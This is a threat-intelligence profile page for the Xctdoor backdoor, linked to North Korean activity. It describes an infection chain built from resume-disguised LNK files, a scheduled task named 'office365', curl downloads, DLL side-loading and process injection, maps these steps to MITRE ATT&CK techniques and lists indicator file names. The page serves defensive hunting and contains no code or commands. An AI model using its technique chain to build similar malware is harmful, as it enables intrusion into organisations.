Skip to main content
Mallory
Back to malware
Malware

Xctdoor

Xctdoor is a backdoor malware associated in the provided content with North Korea/DPRK activity. It is described as being delivered through multiple intrusion chains, including malicious Windows shortcut (LNK) files disguised as resume documents and a campaign in which it was disguised as a security installation program. In the resume-themed chain, execution of the LNK displayed a decoy resume while silently creating batch, PowerShell, and VBScript files under C:\Users\Public\Videos, registering persistence via a scheduled task named "office365," downloading additional payloads with curl, decoding Base64 content, and creating Startup-folder persistence. The later stage generated ProximityUxHost.exe, ProximityCommon.DLL, settings.dat, and MicrosoftBing.LNK, then used DLL side-loading through the legitimate ProximityUxHost.exe to load ProximityCommon.dll. After that DLL was loaded, Xctdoor contained in settings.dat was injected into a legitimate process and executed. The malware was confirmed to attempt communication with an external command-and-control server. The campaign particularly threatened corporate functions that routinely open external documents, including recruitment, sales, and customer service. The content also states that Xctdoor was deployed in a prior supply-chain compromise affecting a South Korean ERP vendor in 2024, alongside references to earlier compromises involving the same vendor. High-confidence suspicious artifacts mentioned in connection with this malware include the scheduled task name "office365" and files such as ProximityCommon.DLL, settings.dat, and MicrosoftBing.LNK under the Microsoft.BingSearch365_8wekyb3d8bbwe AppData path.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.001Spearphishing AttachmentEvidence1

document files disguised as resumes can be easily opened in a work environment... when opening resume files or document-type Attachments from unknown sources

Execution

5 techniques
T1053.005Scheduled TaskEvidence1

This PowerShell script registers a Task Scheduler job named “office365” to ensure the VBScript file runs every 10 minutes.

T1059.001PowerShellEvidence1

batch files (.bat), PowerShell scripts (.ps1), and VBScript files (.vbs) with random names are created... the newly created PowerShell script is subsequently executed.

T1059.003Windows Command ShellEvidence1

The batch file executed by VBScript uses the `curl` command to download additional files from an external server.

T1059.005Visual BasicEvidence1

The VBScript file then executes a batch file, which triggers the next phase of malicious behavior.

T1204.002Malicious FileEvidence1

Execution of a malicious LNK file disguised as a resume

Persistence

2 techniques
T1053.005Scheduled TaskEvidence1

This PowerShell script registers a Task Scheduler job named “office365” to ensure the VBScript file runs every 10 minutes.

T1547.001Registry Run Keys / Startup FolderEvidence1

p2.ps1 creates a shortcut on the Startup path

Privilege Escalation

3 techniques
T1053.005Scheduled TaskEvidence1

This PowerShell script registers a Task Scheduler job named “office365” to ensure the VBScript file runs every 10 minutes.

T1055Process InjectionEvidence1

after ProximityCommon.dll was loaded, the backdoor malware Xctdoor (contained in settings.dat) was injected into the legitimate process and executed.

T1547.001Registry Run Keys / Startup FolderEvidence1

p2.ps1 creates a shortcut on the Startup path

Stealth

3 techniques
T1036MasqueradingEvidence2

Threat actors name the files to resemble resume documents containing company names and job titles, and when executed, they display a legitimate decoy file alongside the malicious file to lower the user’s suspicion.

T1055Process InjectionEvidence1

after ProximityCommon.dll was loaded, the backdoor malware Xctdoor (contained in settings.dat) was injected into the legitimate process and executed.

T1140Deobfuscate/Decode Files or InformationEvidence1

Some of the downloaded files are encoded in Base64 and, after decoding, are saved as additional PowerShell scripts

Command and Control

2 techniques
T1071Application Layer ProtocolEvidence1

Analysis revealed that this malware attempted to communicate with a specific external C2 server.

T1105Ingress Tool TransferEvidence1

The batch file executed by VBScript uses the `curl` command to download additional files from an external server.

ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

3 SOURCESView more in app
ahnlab asec blogNews
Jun 16, 2026
It looks like a normal resume, but the infection begins the moment it is opened. - ASEC

Backdoor malware delivered through malicious LNK resume-themed files. The infection chain uses embedded scripts, scheduled-task persistence, startup shortcut creation, additional file downloads, and DLL side-loading via a legitimate executable before injecting and executing Xctdoor, which then attempts to communicate with an external C2 server.

Read more
lazarusholic blueskyNews
Mar 30, 2026
Post by @lazarusholic.bsky.social - Bluesky

A named malware family identified as XCTDoor, described in the context of a North Korean-themed security installer lure and execution chain. The content implies it functions as a backdoor.

Read more
the hacker newsNews
Jan 26, 2026
Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers

Backdoor family previously deployed via ERP vendor supply-chain compromise (not further described in the content).

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping12

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.